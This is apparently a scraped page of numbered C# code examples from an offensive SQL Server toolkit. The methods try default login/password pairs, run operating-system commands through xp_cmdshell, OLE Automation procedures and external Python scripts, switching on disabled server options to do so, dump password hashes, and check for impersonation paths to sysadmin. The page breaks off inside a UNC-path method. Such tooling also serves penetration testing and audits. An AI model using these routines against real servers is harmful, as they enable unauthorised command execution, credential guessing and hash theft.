Пример #1
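        /// <summary>
        /// Tries every default login/password pair registered for this instance's
        /// service name and reports each pair that authenticates.
        /// </summary>
        /// <returns>
        /// false when the instance name is empty or no defaults are registered for it;
        /// true otherwise, whether or not any pair authenticated.
        /// </returns>
        internal override bool Query()
        {
            if (string.IsNullOrEmpty(instance))
            {
                return(false);
            }

            using (SQLConnection sql = new SQLConnection(instance))
            {
                // The lookup key is the text after the last '\' or ',' in the instance
                // string (host\name or host,port forms).
                string   dbInstance = instance.Split(new string[] { @"\", @"," }, StringSplitOptions.RemoveEmptyEntries).LastOrDefault();
                string[] defaults   = logins.GetValues(dbInstance);
                // If logins is a NameValueCollection, GetValues returns null for an
                // unknown key; the old code dereferenced the result unconditionally.
                if (defaults == null || 0 == defaults.Length)
                {
                    return(false);
                }

                foreach (var d in defaults)
                {
                    // Entries are "user\0password". A malformed entry without the NUL
                    // separator used to throw IndexOutOfRangeException; it is skipped now.
                    // The raw echo of each entry (Console.WriteLine(d)) was debug output
                    // that printed every candidate secret and has been dropped.
                    string[] userpass = d.Split('\0');
                    if (userpass.Length < 2)
                    {
                        continue;
                    }
                    Credentials creds = new Credentials(userpass[0], userpass[1]);
                    sql.BuildConnectionString(creds);
                    if (sql.Connect())
                    {
                        Console.WriteLine("[+] {0} : {1}:{2}", instance, creds.GetUsername(), creds.GetPassword());
                    }
                }
            }

            return(true);
        }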
Пример #2
        /// <summary>
        /// Runs an operating-system command on the server through the OLE Automation
        /// stored procedures: the command's output is redirected into <c>fileName</c>,
        /// read back by a second batch, and the file is removed by a third one.
        /// The two sp_configure options this needs are switched on when they are off
        /// and, if <c>restoreState</c> is set, switched back afterwards.
        /// </summary>
        /// <param name="query">Command line handed to <c>cmd.exe /c</c>; it is not escaped.</param>
        internal void Query(string query)
        {
            // Changing sp_configure options needs sysadmin; stop before touching anything otherwise.
            if (!SQLSysadminCheck.Query(instance, computerName, credentials))
            {
                Console.WriteLine("[-] User is not SysAdmin");
                return;
            }
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return;
                }

                // NOTE(review): the (int) casts assume _Query returns a boxed int for the
                // "config_value" column; a DBNull or string result would throw InvalidCastException.
                int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
                if (0 == sao_value)
                {
                    Console.WriteLine("{0} : Show Advanced Options is disabled, enabling.", instance);
                    _Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
                }

                // 'Ole Automation Procedures' is read only after the step above, since
                // it is one of the advanced options.
                int xcs_value = (int)_Query(sql, @"sp_configure 'Ole Automation Procedures'", "config_value");
                if (0 == xcs_value)
                {
                    Console.WriteLine("{0} : Ole Automation Procedures is disabled, enabling.", instance);
                    _Query(sql, @"sp_configure 'Ole Automation Procedures',1;RECONFIGURE", string.Empty);
                }

                // Batch 1: QUERY1_1 (presumably declares and creates @shell) followed by
                // the run call, with the command's output redirected into fileName.
                // A double quote or quote in `query` breaks the literal; nothing is escaped.
                StringBuilder sb = new StringBuilder();
                sb.Append(QUERY1_1);
                sb.Append(string.Format("EXEC Sp_oamethod @shell, \'run\' , null, \'cmd.exe /c \"{0} > {1}\"\'", query, fileName));
                Console.WriteLine(App.DELIMITER);
                Console.WriteLine((string)_Query(sql, sb.ToString(), string.Empty));
                Console.WriteLine(App.DELIMITER);

                // NOTE(review): a fixed one-second pause is the only synchronisation with
                // the redirected output file; a slower command is read back incomplete.
                System.Threading.Thread.Sleep(1000);
                // Batch 2: open fileName (via @fso/@file and again via @o/@f) and return
                // its contents in the "output" column.
                sb.Clear();
                sb.Append(QUERY2_1);
                sb.Append(string.Format("EXEC Sp_oamethod @fso, \'opentextfile\' , @file Out, \'{0}\', 1", fileName));
                sb.Append(QUERY2_3);
                sb.Append(string.Format("EXEC sp_oamethod @o, \'opentextfile\', @f out, \'{0}\', 1", fileName));
                sb.Append(QUERY2_5);
                Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));

                // Batch 3: delete the output file.
                sb.Clear();
                sb.Append(QUERY3_1);
                sb.Append(string.Format("EXEC Sp_oamethod @Shell, \'run\' , null, \'cmd.exe /c \"del {0}\"\' , \'0\' , \'true\'", fileName));
                Console.WriteLine((string)_Query(sql, sb.ToString(), string.Empty));

                // Restore only what this call switched on, in reverse order (advanced
                // option first, then 'Show Advanced Options'). There is no try/finally,
                // so an exception in any _Query above leaves the options enabled.
                if (0 == xcs_value && restoreState)
                {
                    _Query(sql, @"sp_configure 'Ole Automation Procedures',0;RECONFIGURE", string.Empty);
                }
                if (0 == sao_value && restoreState)
                {
                    _Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
                }
            }
        }
Пример #3
        /// <summary>
        /// Walks database ids from <c>start</c> to <c>end</c> inclusive, asks the server
        /// for DB_NAME() of each id, and collects one <c>Fuzz</c> entry per row into
        /// <c>fuzzed</c>.
        /// </summary>
        /// <returns>
        /// false when the connection fails or a row cannot be mapped; true otherwise.
        /// </returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                for (int dbId = start; dbId <= end; dbId++)
                {
                    // One round trip per id; the id is echoed back as a string column.
                    string probe = string.Format(
                        "SELECT \'{0}\' as [ComputerName],\n" +
                        "\'{1}\' as [Instance],\n" +
                        "\'{2}\' as [DatabaseId],\n" +
                        "DB_NAME({2}) as [DatabaseName]",
                        computerName, instance, dbId
                        );
#if DEBUG
                    Console.WriteLine(probe);
#endif
                    table = sql.Query(probe);

                    foreach (DataRow row in table.AsEnumerable())
                    {
                        try
                        {
                            Fuzz entry = new Fuzz
                            {
                                ComputerName = computerName,
                                Instance     = instance,
                                DatabaseId   = (string)row["DatabaseId"],
                            };
                            // DatabaseName comes back as DBNull when the id does not
                            // resolve; the property is left unset in that case.
                            object name = row["DatabaseName"];
                            if (!(name is DBNull))
                            {
                                entry.DatabaseName = (string)name;
                            }
#if DEBUG
                            Misc.PrintStruct <Fuzz>(entry);
#endif
                            fuzzed.Add(entry);
                        }
                        catch (ArgumentNullException)
                        {
                            // A null-argument failure skips just this row.
                            continue;
                        }
                        catch (Exception ex)
                        {
                            // Anything else aborts the whole scan.
                            Console.WriteLine(ex.Message);
                            return(false);
                        }
                    }
                }
            }
            return(true);
        }
Пример #4
        /// <summary>
        /// Loads the rows of <c>QUERY1_1</c> and hands each to <c>_AddLink</c>, then
        /// records this instance as <c>sourceInstance</c> and passes every
        /// <c>srvname</c> returned by <c>QUERY2_1</c> to <c>_Query</c> with a trailing
        /// argument of 0.
        /// </summary>
        /// <returns>false when the connection fails; true otherwise.</returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }
#if DEBUG
                Console.WriteLine(QUERY1_1);
#endif
                DataTable links = sql.Query(QUERY1_1);
                foreach (DataRow link in links.AsEnumerable())
                {
                    _AddLink(link);
                }
#if DEBUG
                Console.WriteLine(QUERY2_1);
#endif
                // Whatever _Query does downstream is rooted at the instance connected here.
                sourceInstance = instance;
                DataTable targets = sql.Query(QUERY2_1);
                foreach (DataRow target in targets.AsEnumerable())
                {
                    string serverName = (string)target["srvname"];
#if DEBUG
                    Console.WriteLine(serverName);
#endif
                    _Query(sql, string.Empty, serverName, 0);
                }
            }
            return(true);
        }
Пример #5
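        /// <summary>
        /// Runs the server-link listing (<c>QUERY1_2</c> prefixed with the identifying
        /// columns, optionally narrowed by <c>linkNameFilter</c>) into <c>serverLinks</c>.
        /// </summary>
        /// <returns>false when the connection fails; true otherwise.</returns>
        internal override bool Query()
        {
            string query1_1 = string.Format(
                "SELECT  \'{0}\' as [ComputerName],\n" +
                "\'{1}\' as [Instance],",
                computerName, instance
                );

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(QUERY1_2);
                if (!string.IsNullOrEmpty(linkNameFilter))
                {
                    sb.Append(linkNameFilter);
                }
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                serverLinks = sql.Query <ServerLink>(sb.ToString(), new ServerLink());
                // The unconditional Console.WriteLine("Test") that followed here was
                // leftover debug output and has been removed.
            }
            return(true);
        }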
Пример #6
        /// <summary>
        /// Switches to <c>database</c> and runs <c>QUERY1_2</c> with the identifying
        /// columns in front and the optional <c>procedureNameFilter</c> appended,
        /// storing the result in <c>procedures</c>.
        /// </summary>
        /// <returns>false when the connection fails; true otherwise.</returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                // Header: USE the target database and echo the identifying columns.
                string header = string.Format("use [{0}];\n" +
                                              "SELECT \'{1}\' as [ComputerName],\n" +
                                              "\'{2}\' as [Instance],\n" +
                                              "\'{3}\' as [DatabaseName],\n",
                                              database, computerName, instance, database);

                // An empty or null filter contributes nothing, exactly like the
                // guarded Append it replaces.
                string filter    = string.IsNullOrEmpty(procedureNameFilter) ? string.Empty : procedureNameFilter;
                string statement = string.Concat(header, QUERY1_2, filter);

#if DEBUG
                Console.WriteLine(statement);
#endif
                procedures = sql.Query <Procedure>(statement, new Procedure());
            }
            return(true);
        }
Пример #7
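        /// <summary>
        /// Switches to <c>database</c> and runs <c>QUERY1_2</c> with the identifying
        /// columns in front and the <c>autoExecFilter</c>, <c>procedureNameFilter</c>
        /// and <c>keywordFilter</c> fragments appended, storing the result in
        /// <c>files</c>.
        /// </summary>
        /// <returns>false when the connection fails; true otherwise.</returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                // The format placeholders were off by one: [ComputerName] received {0}
                // (the database) and [Instance] received {1} (the computer name), and
                // the instance argument was never used. {1}/{2} fixes the mapping.
                string query1_1 = string.Format(
                    "USE [{0}];" +
                    "SELECT  \'{1}\' as [ComputerName]," +
                    "\'{2}\' as [Instance],",
                    database, computerName, instance);

                // StringBuilder.Append ignores a null string, so the filters need no guards.
                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(QUERY1_2);
                sb.Append(autoExecFilter);
                sb.Append(procedureNameFilter);
                sb.Append(keywordFilter);
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                files = sql.Query <AssemblyFiles>(sb.ToString(), new AssemblyFiles());
            }
            return(true);
        }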
Пример #8
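        /// <summary>
        /// Lists the tables of <c>database</c> via INFORMATION_SCHEMA.TABLES, with the
        /// identifying columns in front, <c>QUERY1_3</c>/<c>QUERY1_5</c> around the FROM
        /// clause and the optional <c>tableFilter</c> appended, storing the result in
        /// <c>tables</c>.
        /// </summary>
        /// <returns>false when the connection fails; true otherwise.</returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                StringBuilder sb = new StringBuilder();
                sb.Append(string.Format("USE {0};\n", database));
                sb.Append(string.Format("SELECT \'{0}\' as [ComputerName],\n", computerName));
                sb.Append(string.Format("\'{0}\' as [Instance],", instance));
                sb.Append(QUERY1_3);
                sb.Append(string.Format("FROM[{0}].[INFORMATION_SCHEMA].[TABLES]", database));
                if (!string.IsNullOrEmpty(tableFilter))
                {
                    sb.Append(tableFilter);
                }
                sb.Append(QUERY1_5);
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                // Rows are mapped straight into Table objects by the typed Query overload;
                // the earlier hand-written DataRow-to-Table loop was dead code and is gone.
                tables = sql.Query <Table>(sb.ToString(), new Table());
            }
            return(true);
        }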
Пример #9
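        /// <summary>
        /// Lists databases on the instance into <c>databases</c>. The statement is
        /// assembled from <c>query1_2</c>..<c>query1_4</c> (the <c>query1_3</c> part
        /// only for major version above 10) plus the optional database / no-defaults /
        /// has-access / sysadmin filters.
        /// </summary>
        /// <returns>
        /// false when the connection or the server-info query fails; true otherwise.
        /// </returns>
        internal override bool Query()
        {
            string query1_1 = string.Format(
                "SELECT  \'{0}\' as [ComputerName],\n" +
                "\'{1}\' as [Instance],",
                computerName, instance);

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                SQLServerInfo serverInfo = new SQLServerInfo(credentials);
                serverInfo.SetInstance(instance);
                if (!serverInfo.Query())
                {
                    return(false);
                }
                SQLServerInfo.Details details = serverInfo.GetResults();

                // The major version picks the query shape. A null or unparsable version
                // used to be treated silently as 0; it is now reported, and the same
                // pre-11 shape is used so behaviour otherwise matches the old code.
                int    versionShort = 0;
                string major        = (details.SQLServerMajorVersion ?? string.Empty).Split('.').First();
                if (!int.TryParse(major, out versionShort))
                {
                    Console.WriteLine("[-] Unable to ascertain SQL Version");
                }

                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(query1_2);
                if (versionShort > 10)
                {
                    sb.Append(query1_3);
                }
                sb.Append(query1_4);

                // StringBuilder.Append ignores null and empty strings, so the filters
                // need no IsNullOrEmpty guards.
                sb.Append(databaseFilter);
                sb.Append(noDefaultsFilter);
                sb.Append(hasAccessFilter);
                sb.Append(sysAdminFilter);
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                databases = sql.Query <Database>(sb.ToString(), new Database());
            }
            return(true);
        }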
Пример #10
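        /// <summary>
        /// Reads the full <c>sp_configure</c> listing into <c>configs</c>. 'Show
        /// Advanced Options' is switched on for the duration when it was off
        /// (presumably so advanced settings are listed too) and switched back when
        /// <c>restoreState</c> is set.
        /// </summary>
        /// <returns>false when the connection fails; true otherwise.</returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                // NOTE(review): the cast assumes _Query returns a boxed int for
                // "config_value"; a DBNull or string result would throw InvalidCastException.
                int  sao_value     = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
                bool enabledByUs   = 0 == sao_value;
                if (enabledByUs)
                {
                    _Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
                }

                // Rows are mapped into Config objects by the typed Query overload; the
                // earlier hand-written DataRow-to-Config loop was dead code and is gone.
                configs = sql.Query <Config>("sp_configure", new Config());

                // Undo only what this call changed, and only when asked to. There is no
                // try/finally, so an exception above leaves the option enabled.
                if (enabledByUs && restoreState)
                {
                    _Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
                }
            }
            return(true);
        }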
Пример #11
        /// <summary>
        /// Executes an operating-system command through <c>xp_cmdshell</c> and prints
        /// the "output" column between <c>App.DELIMITER</c> lines. The two sp_configure
        /// options it depends on are switched on when they are off and, if
        /// <c>restoreState</c> is set, switched back afterwards.
        /// </summary>
        /// <param name="query">Command line placed inside the xp_cmdshell string literal; it is not escaped.</param>
        internal void Query(string query)
        {
            // Changing sp_configure options needs sysadmin; stop before touching anything otherwise.
            if (!SQLSysadminCheck.Query(instance, computerName, credentials))
            {
                Console.WriteLine("[-] User is not SysAdmin");
                return;
            }
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return;
                }

                // NOTE(review): the (int) casts assume _Query returns a boxed int for the
                // "config_value" column; a DBNull or string result would throw InvalidCastException.
                int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
                if (0 == sao_value)
                {
                    Console.WriteLine("{0} : Show Advanced Options is disabled, enabling.", instance);
                    _Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
                }
                else
                {
                    Console.WriteLine("{0} : Show Advanced Options is enabled.", instance);
                }

                // 'xp_cmdshell' is read only after the step above, since it is one of
                // the advanced options.
                int xcs_value = (int)_Query(sql, @"sp_configure 'xp_cmdshell'", "config_value");
                if (0 == xcs_value)
                {
                    Console.WriteLine("{0} : xp_cmdshell is disabled, enabling.", instance);
                    _Query(sql, @"sp_configure 'xp_cmdshell',1;RECONFIGURE", string.Empty);
                }
                else
                {
                    Console.WriteLine("{0} : xp_cmdshell is enabled.", instance);
                }

                Console.WriteLine(App.DELIMITER);
                // A single quote in `query` ends the literal early; nothing is escaped here.
                Console.WriteLine((string)_Query(sql, string.Format("EXEC master..xp_cmdshell \'{0}\'", query), "output"));
                Console.WriteLine(App.DELIMITER);

                // Restore only what this call switched on, in reverse order (xp_cmdshell
                // first, then 'Show Advanced Options'). There is no try/finally, so an
                // exception in any _Query above leaves the options enabled.
                if (0 == xcs_value && restoreState)
                {
                    Console.WriteLine("{0} : Disabling xp_cmdshell.", instance);
                    _Query(sql, @"sp_configure 'xp_cmdshell',0;RECONFIGURE", string.Empty);
                }

                if (0 == sao_value && restoreState)
                {
                    Console.WriteLine("{0} : Disabling Show Advanced Options.", instance);
                    _Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
                }
            }
        }
Пример #12
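 /// <summary>
 /// Runs an arbitrary T-SQL batch against the instance and prints every column of
 /// every row, one value per line; binary columns are rendered as hex through
 /// BitConverter.ToString.
 /// </summary>
 /// <param name="query">Batch executed as-is.</param>
 /// <returns>
 /// false when the connection fails or the result cannot be read; true otherwise.
 /// </returns>
 internal bool Query(string query)
 {
     using (SQLConnection sql = new SQLConnection(instance))
     {
         sql.BuildConnectionString(credentials);
         if (!sql.Connect())
         {
             // This path used to fall through to "return true", so a failed
             // connection was indistinguishable from a successful query.
             return(false);
         }

         DataTable     table  = sql.Query(query);
         StringBuilder output = new StringBuilder();
         try
         {
             // AsEnumerable() throws ArgumentNullException when no table came back;
             // that is reported as an empty response below.
             foreach (DataRow row in table.AsEnumerable())
             {
                 foreach (var col in row.ItemArray)
                 {
                     try
                     {
                         if (col is byte[])
                         {
                             output.AppendFormat("{0}\n", BitConverter.ToString((byte[])col));
                         }
                         else
                         {
                             output.AppendFormat("{0}\n", col);
                         }
                     }
                     catch (Exception ex)
                     {
                         // Best effort per cell: report and move on to the next value.
                         Console.WriteLine(ex.Message);
                         continue;
                     }
                 }
             }
             Console.WriteLine(output.ToString());
         }
         catch (ArgumentNullException)
         {
             Console.WriteLine("Empty Response");
             return(false);
         }
         catch (Exception ex)
         {
             Console.WriteLine(ex.Message);
             return(false);
         }
     }
     return(true);
 }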
Пример #13
        /// <summary>
        /// Runs <c>QUERY1_1</c> (presumably the OLE provider listing, given the result
        /// type) and stores the typed rows in <c>oleProviders</c>.
        /// </summary>
        /// <returns>false when the connection fails; true otherwise.</returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (sql.Connect())
                {
                    oleProviders = sql.Query <OleProvider>(QUERY1_1, new OleProvider());
                    return(true);
                }
            }
            return(false);
        }
Пример #14
        /// <summary>
        /// Lists permissions granted to principals inside <c>database</c>, joining
        /// database_principals, database_permissions, schemas and objects, with the
        /// optional permission-name, principal-name and permission-type filters
        /// appended, and stores the typed rows in <c>databasePrivileges</c>.
        /// </summary>
        /// <returns>false when the connection fails; true otherwise.</returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                // Leading USE + SELECT with the identifying columns.
                string selectPart = string.Format(
                    "USE {0};\n" +
                    "SELECT \'{1}\' as [ComputerName],\n" +
                    "\'{2}\' as [Instance],\n" +
                    "\'{0}\' as [DatabaseName],",
                    database, computerName, instance);

                // FROM/JOIN clauses. The trailing "WHERE 1 = 1" is presumably there so
                // the filter fragments can be appended as further conditions.
                string fromPart = string.Format(
                    "FROM {0}.sys.database_principals rp \n" +
                    "INNER JOIN {0}.sys.database_permissions pm \n" +
                    "ON pm.grantee_principal_id = rp.principal_id \n" +
                    "LEFT JOIN {0}.sys.schemas ss \n" +
                    "ON pm.major_id = ss.schema_id \n" +
                    "LEFT JOIN {0}.sys.objects obj \n" +
                    "ON pm.[major_id] = obj.[object_id] WHERE 1 = 1",
                    database);

                // string.Concat treats null as empty, which matches the IsNullOrEmpty
                // guards the previous StringBuilder version placed around each filter.
                string statement = string.Concat(
                    selectPart,
                    QUERY1_2,
                    fromPart,
                    permissionNameFilter,
                    principalNameFilter,
                    permissionTypeFilter);
#if DEBUG
                Console.WriteLine(statement);
#endif
                databasePrivileges = sql.Query <DatabasePrivilege>(statement, new DatabasePrivilege());
            }
            return(true);
        }
Пример #15
        /// <summary>
        /// Executes an operating-system command through the server's external-script
        /// feature: a Python snippet that runs <c>cmd.exe /c</c> is spliced between
        /// <c>QUERY1_1</c> and <c>QUERY1_3</c>/<c>QUERY1_4</c> and its "output" column
        /// is printed. The two sp_configure options it depends on are switched on when
        /// off and, if <c>restoreState</c> is set, switched back afterwards.
        /// </summary>
        /// <param name="query">Command line placed inside the Python string literal; it is not escaped.</param>
        internal void Query(string query)
        {
            // Changing sp_configure options needs sysadmin; stop before touching anything otherwise.
            if (!SQLSysadminCheck.Query(instance, computerName, credentials))
            {
                Console.WriteLine("[-] User is not SysAdmin");
                return;
            }
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return;
                }

                // NOTE(review): the (int) casts assume _Query returns a boxed int for the
                // "config_value" column; a DBNull or string result would throw InvalidCastException.
                int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
                if (0 == sao_value)
                {
                    _Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
                }

                // 'external scripts enabled' is read only after the step above, since
                // it is one of the advanced options. (The local is named xcs_value in
                // the sibling methods as well, although no xp_cmdshell is involved here.)
                int xcs_value = (int)_Query(sql, @"sp_configure 'external scripts enabled'", "config_value");
                if (0 == xcs_value)
                {
                    _Query(sql, @"sp_configure 'external scripts enabled',1;RECONFIGURE", string.Empty);
                }

                // QUERY1_1 / QUERY1_3 / QUERY1_4 presumably wrap the Python line in the
                // external-script call and expose its stdout as "output" — confirm
                // against their definitions. A double quote in `query` breaks the literal.
                StringBuilder sb = new StringBuilder();
                sb.Append(QUERY1_1);
                sb.Append(string.Format("p = subprocess.Popen(\"cmd.exe /c {0}\", stdout=subprocess.PIPE)\n", query));
                sb.Append(QUERY1_3);
                sb.Append(QUERY1_4);
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                Console.WriteLine(App.DELIMITER);
                Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
                Console.WriteLine(App.DELIMITER);

                // Restore only what this call switched on, in reverse order. There is no
                // try/finally, so an exception in any _Query above leaves the options enabled.
                if (0 == xcs_value && restoreState)
                {
                    _Query(sql, @"sp_configure 'external scripts enabled',0;RECONFIGURE", string.Empty);
                }
                if (0 == sao_value && restoreState)
                {
                    _Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
                }
            }
        }
Пример #16
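        /// <summary>
        /// Asks the server whether the login used to connect is a member of the
        /// sysadmin fixed server role (IS_SRVROLEMEMBER('sysadmin')).
        /// </summary>
        /// <param name="instance">Instance to connect to.</param>
        /// <param name="computerName">Host name echoed back as the [ComputerName] column.</param>
        /// <param name="credentials">Login the check is performed as.</param>
        /// <returns>
        /// true only when the first result row reports IsSysadmin = 'Yes'; false on
        /// connection failure, an empty or unreadable result, or any other value.
        /// </returns>
        internal static bool Query(string instance, string computerName, Credentials credentials)
        {
            string query = string.Format(
                "SELECT \'{0}\' as [ComputerName],\n" +
                "\'{1}\' as [Instance],\n" +
                "CASE\n" +
                "WHEN IS_SRVROLEMEMBER(\'sysadmin\') = 0 THEN \'No\'\n" +
                "ELSE \'Yes\'\n" +
                "END as IsSysadmin"
                , computerName, instance
                );

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                DataTable table = sql.Query(query);
                try
                {
                    // The statement produces a single row; the loop returns on the first one.
                    foreach (DataRow row in table.AsEnumerable())
                    {
#if DEBUG
                        // The debug line printed [Instance] twice; the first column is now [ComputerName].
                        Console.WriteLine("{0}\t{1}\t{2}", row["ComputerName"].ToString(), row["Instance"].ToString(), row["IsSysadmin"].ToString());
#endif
                        // Ordinal comparison; the "? true : false" around it was redundant.
                        return("Yes" == row["IsSysadmin"].ToString());
                    }
                }
                catch (ArgumentNullException)
                {
                    // AsEnumerable() throws this when no table came back.
                    Console.WriteLine("Empty Response");
                    return(false);
                }
                catch (Exception ex)
                {
                    Console.WriteLine(ex.Message);
                    return(false);
                }
                // No rows at all: treat as not sysadmin.
                return(false);
            }
        }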
Пример #17
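        /// <summary>
        /// Collects server-level IMPERSONATE grants through the base query and records
        /// an <c>Impersonate</c> finding in <c>impersonates</c> for every grant whose
        /// target login is a sysadmin.
        /// </summary>
        /// <returns>
        /// false when the server-info query, the base query or the connection fails;
        /// true otherwise.
        /// </returns>
        internal override bool Query()
        {
            SQLServerInfo i = new SQLServerInfo(credentials);

            i.SetInstance(instance);
            // The current login name used in the finding text comes from this query, so
            // its failure (previously ignored) now ends the check.
            if (!i.Query())
            {
                return(false);
            }
            var info = i.GetResults();

            SetPermissionNameFilter("IMPERSONATE");
            // base.Query() fills serverPrivileges; its result was previously ignored.
            if (!base.Query())
            {
                return(false);
            }

            // The other Query() overrides connect as SQLConnection(instance); the
            // parameterless constructor used here before looked like an oversight, and
            // Connect()'s result was never checked.
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }
                foreach (var j in serverPrivileges)
                {
                    // Is the grant's target (ObjectName) itself a sysadmin?
                    string query = string.Format("SELECT IS_SRVROLEMEMBER(\'sysadmin\', \'{0}\') as Status", j.ObjectName);
                    foreach (var r in sql.Query(query).AsEnumerable())
                    {
                        if (!(r["Status"] is DBNull) && 1 == (int)r["Status"])
                        {
                            var s = new Impersonate
                            {
                                ComputerName  = computerName,
                                Instance      = instance,
                                Vulnerability = "Excessive Privilege - Impersonate Login",
                                Description   = "The current SQL Server login can impersonate other logins.  This may allow an authenticated login to gain additional privileges.",
                                Remediation   = "Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user]",
                                Severity      = "High",
                                IsVulnerable  = "Yes",
                                IsExploitable = "Unknown",
                                Exploited     = "No",
                                ExploitCmd    = "",
                                Reference     = @"https://msdn.microsoft.com/en-us/library/ms181362.aspx",
                                Details       = string.Format("{0} can impersonate the {1} SYSADMIN login. This test was ran with the {2} login.", j.GranteeName, j.ObjectName, info.Currentlogin)
                            };
                            impersonates.Add(s);
                        }
                    }
                }
            }
            return(true);
        }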
Пример #18
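        /// <summary>
        /// Runs the version-specific hash query (<c>QUERY1_1</c> for major version 9
        /// and later, <c>QUERY2_1</c> otherwise) into <c>hashes</c>. Requires a
        /// sysadmin login.
        /// </summary>
        /// <returns>
        /// true when the query ran; false on connection failure, a non-sysadmin login,
        /// or an unknown server version. (It previously returned false on success too.)
        /// </returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                if (!SQLSysadminCheck.Query(instance, computerName, credentials))
                {
                    Console.WriteLine("[-] User is not Sysadmin");
                    return(false);
                }

                SQLServerInfo i = new SQLServerInfo(credentials);
                i.SetInstance(instance);
                bool haveInfo = i.Query();
                SQLServerInfo.Details d = i.GetResults();

                // A failed info query or a null version string now reaches the same
                // "unable to ascertain" branch instead of throwing on Split().
                string major = haveInfo && d.SQLServerMajorVersion != null
                    ? d.SQLServerMajorVersion.Split('.').First()
                    : string.Empty;
                int versionShort;
                if (!int.TryParse(major, out versionShort))
                {
                    Console.WriteLine("[-] Unable to ascertain SQL Version");
                    Console.WriteLine("[*] It is possible to override this with the --version flag");
                    return(false);
                }

                // Major version above 8 selects the newer query text.
                string query = 8 < versionShort ? QUERY1_1 : QUERY2_1;

                hashes = sql.Query <Hash>(query, new Hash());
            }
            // The original returned false here even after a successful run, so callers
            // could not tell success from failure.
            return(true);
        }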
Пример #19
        /// <summary>
        /// Issues two statements that reference <c>uncpath</c> on the server: for major
        /// version 11 and later <c>xp_dirtree</c> then <c>xp_fileexist</c>, for older
        /// servers BACKUP LOG then BACKUP DATABASE of [TESTING] to that path. No result
        /// is collected.
        /// </summary>
        /// <returns>
        /// false only when the server version cannot be parsed; true otherwise — including
        /// when the connection fails, since that branch falls through to the final return.
        /// </returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (sql.Connect())
                {
                    SQLServerInfo i = new SQLServerInfo(credentials);
                    i.SetInstance(instance);
                    // NOTE(review): i.Query()'s result is ignored; if it failed and
                    // SQLServerMajorVersion is null, the Split() below throws.
                    i.Query();
                    SQLServerInfo.Details d = i.GetResults();

                    int versionShort;
                    if (!int.TryParse(d.SQLServerMajorVersion.Split('.').First(), out versionShort))
                    {
                        Console.WriteLine("[-] Unable to ascertain SQL Version");
                        Console.WriteLine("[*] It is possible to override this with the --version flag");
                        return(false);
                    }

                    string query1 = string.Empty;
                    string query2 = string.Empty;
                    // The major version decides which pair of statements is used.
                    if (11 > versionShort)
                    {
